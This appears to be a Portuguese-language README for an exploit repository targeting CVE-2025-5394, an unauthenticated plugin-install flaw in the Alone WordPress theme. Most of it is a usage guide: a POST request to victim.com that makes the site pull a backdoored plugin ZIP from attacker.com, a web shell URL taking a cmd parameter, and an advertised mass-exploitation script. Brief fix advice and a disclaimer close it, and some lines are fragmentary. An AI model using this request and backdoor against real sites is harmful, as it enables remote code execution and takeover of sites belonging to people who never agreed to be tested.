
Alone – Tema WordPress Multipropósito Sem Fins Lucrativos para Caridade <= 7.8.3 - Autorização Ausente para Upload Arbitrário de Arquivos Não Autenticado via Instalação de Plugin
🔥 Resumo da Vulnerabilidade
O tema Alone do WordPress versões <= 7.8.3 é vulnerável a uma vulnerabilidade de upload arbitrário de arquivo não autenticado. Essa falha permite que atacantes não autenticados façam upload e instalem arquivos ZIP de plugins arbitrários a partir de URLs remotas por meio de um endpoint AJAX desprotegido — resultando em execução remota de código (RCE) ao implantar plugins com backdoor.
Esta vulnerabilidade se origina da função beplus_import_pack_install_plugin exposta ao público via wp_ajax_nopriv_ sem qualquer verificação de autenticação ou capacidade. A função instala e ativa um plugin a partir de uma URL fornecida pelo usuário.
🔍 Tema Afetado
🧪 Características do Exploit
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Pesquisador
🚀 Uso
Prepare um arquivo ZIP de plugin malicioso hospedado em um servidor que você controla.
Plugin Name:) e backdoor PHP (ex.: bk.php)Elabore a seguinte requisição POST:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
Se bem-sucedido, o plugin é instalado e ativado. Acesse seu shell em:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Script de Exploração em Massa Este repositório inclui uma ferramenta de exploração em massa com:
result.txtVeja mass_beplus_exploit.py para detalhes.
🛠 Recomendações de Correção
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 Aviso Legal:
Esta informação é fornecida apenas para fins educacionais e de teste de segurança autorizado. O acesso ou uso não autorizado de sistemas de computador é ilegal e antiético.
📚 Referência:
CVE: CVE-2025-5394
Pesquisador: Thai An